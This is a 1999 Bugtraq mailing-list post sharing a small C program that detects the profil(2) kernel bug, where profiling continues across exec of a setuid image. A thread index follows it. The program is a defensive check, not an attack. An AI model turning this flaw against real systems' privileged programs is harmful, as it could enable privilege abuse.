Bugtraq mailing list archives
profil(2) bug, a simple test program
From: ross () GHS COM (Ross Harvey)
Date: Mon, 9 Aug 1999 04:18:36 -0700
This program will check to see if a given system has the profil(2) bug described in NetBSD Security Advisory 1999-011. If it prints `Counting!' then you've got it... At least one system (Solaris) appears to fix the security issue but doesn't turn off profiling unless the new image is owned by a different user. To check for this, you need to do something like: % cc profiltest.c % su # mv a.out prog.setuid # chown (something) prog.setuid # (possibly make it setuid) # exit % ./a.out If the program doesn't find prog.setuid, it just exec's itself; this gets the same result on most systems. (So: % cc profiltest.c; ./a.out) So far, I've only found it in BSD systems. Linux hasn't had profiling in the kernel for a while, so current versions should not be vulnerable. #include <sys/types.h> #include <stdio.h> #include <unistd.h> volatile unsigned short twobins[2]; int main(int ac, char **av) { if (ac == 1) { /* can't check the return value; on some systems it's void */ profil((char *)twobins, sizeof twobins, (u_long)&main, 2); /* try a different image for uid/setuid tests */ execl("prog.setuid", "tryroot", "-", 0); /* otherwise, just chain to ourself */ execl(av[0], av[0], "-", 0); fprintf(stderr, "problems\n"); exit(1); } for(;;) { if (twobins[0] | twobins[1]) { printf("Counting!\n"); twobins[0] = twobins[1] = 0; } } } /* ross.harvey () computer org */
Current thread:
- Re: user flags in public temp space (was Re: chflags() [heads up]), (continued)
- Re: user flags in public temp space (was Re: chflags() [heads up]) Andrew Brown (Aug 05)
- Re: user flags in public temp space (was Re: chflags() [heads up]) Darren Reed (Aug 05)
- Re: user flags in public temp space (was Re: chflags() [heads up]) Theo de Raadt (Aug 06)
- Re: user flags in public temp space (was Re: chflags() [heads up]) Darren Reed (Aug 06)
- Re: user flags in public temp space (was Re: chflags() [heads up]) Tim Fletcher (Aug 06)
- Re: user flags in public temp space (was Re: chflags() [heads up]) Darren Reed (Aug 07)
- Re: user flags in public temp space (was Re: chflags() [heads up]) Doug Harple (Aug 09)
- Re: user flags in public temp space (was Re: chflags() [heads up Adam Morris (Aug 09)
- Re: user flags in public temp space (was Re: chflags() [heads up James E. Pace (Aug 10)
- New cfingerd 1.4.0 - Configurable Finger Daemon Martin Schulze (Aug 10)
- profil(2) bug, a simple test program Ross Harvey (Aug 09)
- ISS Security Advisory: Denial of Service Attack Against Windows NT Terminal Server X-Force (Aug 09)
- Uploaded cfingerd 1.3.2-18.1 for Debian (security fix) Leszek Gerwatowski (Aug 09)